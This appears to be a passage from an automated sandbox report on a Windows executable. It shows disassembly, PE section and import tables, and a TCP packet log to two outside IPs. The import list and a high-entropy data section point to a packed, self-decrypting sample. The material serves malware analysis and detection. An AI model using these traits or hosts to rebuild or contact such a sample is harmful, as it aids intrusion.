                                                                                  jc 00007F13E0BBE8ECh
                                                                                  mov eax, dword ptr [edx+08h]
                                                                                  add eax, dword ptr [edx+0Ch]
                                                                                  cmp ecx, eax
                                                                                  jc 00007F13E0BBE8EEh
                                                                                  add edx, 28h
                                                                                  cmp edx, esi
                                                                                  jne 00007F13E0BBE8CCh
                                                                                  xor eax, eax
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  ret
                                                                                  mov eax, edx
                                                                                  jmp 00007F13E0BBE8DBh
                                                                                  push esi
                                                                                  call 00007F13E0BBF35Dh
                                                                                  test eax, eax
                                                                                  je 00007F13E0BBE902h
                                                                                  mov eax, dword ptr fs:[00000018h]
                                                                                  mov esi, 0045DB4Ch
                                                                                  mov edx, dword ptr [eax+04h]
                                                                                  jmp 00007F13E0BBE8E6h
                                                                                  cmp edx, eax
                                                                                  je 00007F13E0BBE8F2h
                                                                                  xor eax, eax
                                                                                  mov ecx, edx
                                                                                  lock cmpxchg dword ptr [esi], ecx
                                                                                  test eax, eax
                                                                                  jne 00007F13E0BBE8D2h
                                                                                  xor al, al
                                                                                  pop esi
                                                                                  ret
                                                                                  mov al, 01h
                                                                                  pop esi
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  cmp dword ptr [ebp+08h], 00000000h
                                                                                  jne 00007F13E0BBE8E9h
                                                                                  mov byte ptr [0045DB50h], 00000001h
                                                                                  call 00007F13E0BBEBA7h
                                                                                  call 00007F13E0BC18F0h
                                                                                  test al, al
                                                                                  jne 00007F13E0BBE8E6h
                                                                                  xor al, al
                                                                                  pop ebp
                                                                                  ret
                                                                                  call 00007F13E0BC92C9h
                                                                                  test al, al
                                                                                  jne 00007F13E0BBE8ECh
                                                                                  push 00000000h
                                                                                  call 00007F13E0BC18F7h
                                                                                  pop ecx
                                                                                  jmp 00007F13E0BBE8CBh
                                                                                  mov al, 01h
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  cmp byte ptr [0045DB51h], 00000000h
                                                                                  je 00007F13E0BBE8E6h
                                                                                  mov al, 01h

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x291c80x64.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f0000x1d14.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x272800x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x271c00x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x200000x174.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x1e2ab0x1e4006aaddd29a7b1d14c04fafe4373874165False0.5765996255165289data6.591179392915493IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x200000x9a580x9c00c0d3af8d875e80d0742331423512f2ceFalse0.3869941907051282data4.658571126756863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x2a0000x346540x336002cb86b6c8671c22ce21f5d03dfb1e373False0.9822270377128953data7.9818411522888875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .reloc0x5f0000x1d140x1e0045d81991a944a5e251cf5f207dbbc2a5False0.7373697916666667data6.468270351939864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Imports

                                                                                  DLLImport
                                                                                  GDI32.dllGetClipBox
                                                                                  USER32.dllPostQuitMessage
                                                                                  ADVAPI32.dllCryptDecrypt
                                                                                  KERNEL32.dllHeapSize, CreateFileW, VirtualAlloc, WaitForSingleObject, GetModuleHandleA, FreeConsole, CreateThread, GetProcAddress, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, GetCurrentThreadId, CloseHandle, WaitForSingleObjectEx, GetExitCodeThread, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, ReleaseSRWLockExclusive, WakeAllConditionVariable, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetProcessHeap, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 15, 2024 20:35:50.127605915 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:50.127636909 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:50.127707005 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:50.134161949 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:50.134172916 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:50.364038944 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:50.364135981 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:50.455997944 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:50.456013918 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:50.456284046 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:50.456331968 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:50.461704016 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:50.508116961 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.061505079 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.061527967 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.061563015 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.061635971 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.061645985 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.061687946 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.168766975 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.168817997 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.168853998 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.168865919 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.168914080 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.192764997 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.192811966 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.192836046 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.192854881 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.192898989 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.208177090 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.208195925 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.225543976 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.225575924 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.225739956 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.226167917 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.226177931 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.967655897 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.967739105 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.972084999 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.972090960 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.972296953 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.972352028 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.972640991 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:52.020127058 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:52.523298979 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:52.523364067 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:52.523390055 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:52.523421049 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:52.528031111 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:52.528048038 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:52.530442953 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:52.530478954 CEST4434973295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:52.530564070 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:52.530831099 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:52.530847073 CEST4434973295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:53.003607035 CEST4434973295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:53.003669977 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.004223108 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.004229069 CEST4434973295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:53.006026030 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.006031990 CEST4434973295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:53.896611929 CEST4434973295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:53.896672964 CEST4434973295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:53.896709919 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.896873951 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.896941900 CEST49732443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.896955013 CEST4434973295.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:53.898546934 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.898566961 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:53.898648977 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.898866892 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:53.898880005 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:54.364252090 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:54.364336014 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:54.365077019 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:54.365082979 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:54.366694927 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:54.366699934 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.240196943 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.240227938 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.240287066 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.240338087 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.240365982 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.240637064 CEST49733443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.240654945 CEST4434973395.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.242537022 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.242563009 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.242651939 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.242862940 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.242872000 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.708503008 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.708595037 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.709259033 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.709264040 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:55.711061001 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:55.711065054 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:56.579741955 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:56.579775095 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:56.579838991 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:56.579965115 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:56.579965115 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:56.580218077 CEST49734443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:56.580226898 CEST4434973495.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:56.582036972 CEST49735443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:56.582072020 CEST4434973595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:56.582149982 CEST49735443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:56.582360983 CEST49735443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:56.582379103 CEST4434973595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:57.047574997 CEST4434973595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:57.047646999 CEST49735443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:57.048132896 CEST49735443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:57.048155069 CEST4434973595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:57.049902916 CEST49735443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:57.049916983 CEST4434973595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:57.936156034 CEST4434973595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:57.936227083 CEST4434973595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:57.936357021 CEST49735443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:57.936625957 CEST49735443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:57.936641932 CEST4434973595.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:57.992208004 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:57.992242098 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:57.992317915 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:57.992527008 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:57.992533922 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:58.459124088 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:58.459213972 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:58.460091114 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:58.460104942 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:58.462038040 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:58.462044954 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:58.462117910 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:58.462130070 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:58.980999947 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:58.981039047 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:58.981126070 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:58.981391907 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:58.981405973 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:59.415707111 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:59.415802956 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:59.415915966 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:59.416953087 CEST49736443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:59.416969061 CEST4434973695.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:59.448205948 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:59.448276997 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:59.448715925 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:59.448721886 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:59.450473070 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:59.450476885 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.188930035 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.188982010 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.189007044 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.189022064 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.189052105 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.189062119 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.189105034 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.189131021 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.294585943 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.294606924 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.294698000 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.294711113 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.294751883 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.443916082 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.443938971 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.443994999 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.444006920 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.444040060 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.546825886 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.546854973 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.546940088 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.546952009 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.546993971 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.625664949 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.625684977 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.625756979 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.625765085 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.625804901 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.682224035 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.682255983 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.682328939 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.682342052 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.682379007 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.682399988 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.728302002 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.728322029 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.728414059 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.728421926 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.728458881 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.770004988 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.770021915 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.770095110 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.770103931 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.770142078 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.814878941 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.814894915 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.814986944 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.814995050 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.815043926 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.859046936 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.859066010 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.859132051 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.859138966 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.859164953 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.859180927 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.897353888 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.897372961 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.897459984 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.897465944 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.897505999 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.924133062 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.924185038 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.924226046 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.924232006 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.924271107 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.924288988 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.950184107 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.950202942 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.950273991 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.950282097 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.950320959 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.972244024 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.972286940 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.972316027 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.972328901 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.972361088 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.972373009 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.994633913 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.994649887 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.994699955 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:00.994712114 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:00.994741917 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.017386913 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.017414093 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.017451048 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.017460108 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.017483950 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.017494917 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.037072897 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.037095070 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.037158012 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.037163973 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.037198067 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.055634022 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.055654049 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.055721045 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.055727959 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.055759907 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.055777073 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.072356939 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.072384119 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.072441101 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.072446108 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.072473049 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.072484970 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.089694977 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.089711905 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.089782953 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.089790106 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.089828968 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.105006933 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.105036020 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.105082035 CEST49737443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:36:01.105088949 CEST4434973795.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:36:01.105125904 CEST49737443192.168.2.495.217.240.101
